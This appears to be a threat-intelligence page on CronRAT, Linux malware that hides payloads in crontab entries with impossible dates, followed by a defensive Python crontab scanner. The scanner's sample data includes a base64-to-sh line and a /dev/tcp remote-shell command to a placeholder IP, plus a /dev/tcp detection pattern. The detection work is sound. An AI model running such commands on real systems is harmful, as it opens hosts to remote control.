A strain of malware has been observed using a new technique to hide code. The CronRAT malware hides its payloads in the crontab (the schedule for cron, Linux's task scheduler). However, unlike a traditional scheduled task, CronRAT entries use non-existent dates (such as February 31st) to prevent the task from ever being triggered. The payload is stored in the name of the task, hidden behind layers of obfuscation.
Linux servers infected with CronRAT were seen to be injecting Magecart payloads into their webpages that could then steal credit card info from users of the site.
Check the contents of /etc/cron
Linux eCommerce servers
Containment, Mitigations & Remediations
The Remote Access Trojan (RAT) connects over TCP using the little-known Linux kernel feature that allows TCP connections via a file path. A good detection would be to monitor for use of anything under '/dev/tcp/'.
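The two detection ideas on this page (cron entries with impossible dates, and commands that touch /dev/tcp/) can be combined into one crontab scanner. The script below is an added example written for this page, not code from the CronRAT report or from any vendor tool. The crontab content it scans is constructed sample data: the `/tmp/.x/update.sh` path, the base64 string and the 203.0.113.10 address are placeholders, not indicators from the original page. It assumes numeric cron fields (no `jan`/`mon` names) and treats a day-of-month/month pair as dead only when the day-of-week field is `*`, because cron fires on either match when both are restricted.

```python
import calendar
import re

# Constructed sample crontab (not from the original page). Lines 3 and 5 use
# dates that never occur; line 6 opens a socket through the /dev/tcp path.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
15 4 31 2 * /tmp/.x/update.sh
52 6 1 * * /usr/bin/apt-get update
0 0 30 2 * echo ZWNobyBoaQ== | base64 -d | sh
*/5 * * * * bash -c 'exec 3<>/dev/tcp/203.0.113.10/4444; cat <&3 | sh'
"""

# minute hour dom mon dow command  (a system crontab's user column simply
# becomes the first word of the command, which is fine for this scan)
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
DEV_TCP = re.compile(r"/dev/(tcp|udp)/")


def _values(field, lo, hi):
    """Expand one numeric cron field ('*', lists, ranges, steps) into a set
    of ints. Returns None for syntax this toy parser does not understand."""
    out = set()
    try:
        for part in field.split(","):
            step = 1
            if "/" in part:
                part, step_s = part.split("/", 1)
                step = int(step_s)
            if part == "*":
                rng = range(lo, hi + 1)
            elif "-" in part:
                a, b = part.split("-", 1)
                rng = range(int(a), int(b) + 1)
            else:
                rng = range(int(part), int(part) + 1)
            out.update(v for v in rng if (v - rng.start) % step == 0)
    except ValueError:
        return None
    return out


def never_fires(dom_field, mon_field, dow_field):
    """True if no calendar date can satisfy the day-of-month/month pair.
    If dow is restricted, cron runs the job when EITHER dom or dow matches,
    so such an entry may still execute and is not reported as dead."""
    if dow_field != "*":
        return False
    doms = _values(dom_field, 1, 31)
    mons = _values(mon_field, 1, 12)
    if doms is None or mons is None:
        return False
    # February gets 29: leap years exist, so "29 2" is a real (rare) date.
    max_days = {m: (29 if m == 2 else calendar.monthrange(2021, m)[1])
                for m in range(1, 13)}
    return not any(d <= max_days[m] for d in doms for m in mons)


def scan_crontab(text):
    """Return (line_no, reason, line) for every suspicious entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        _minute, _hour, dom, mon, dow, cmd = m.groups()
        if never_fires(dom, mon, dow):
            findings.append((n, "impossible date: entry can never run", line))
        if DEV_TCP.search(cmd):
            findings.append((n, "/dev/tcp network access from cron", line))
    return findings


if __name__ == "__main__":
    for line_no, reason, line in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {reason}\n    {line}")
```

Run it against real data by feeding the output of `crontab -l` for each user, `/etc/crontab`, and the files under `/etc/cron.d` into `scan_crontab`. The `DEV_TCP` pattern is equally useful over shell history or process command lines, since the page's point is that any `/dev/tcp/` use is worth alerting on. A dead entry with a long, high-entropy command is the CronRAT pattern: the task exists only to carry the payload in its name.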
Indicators of Compromise
T1564 – Hide Artifacts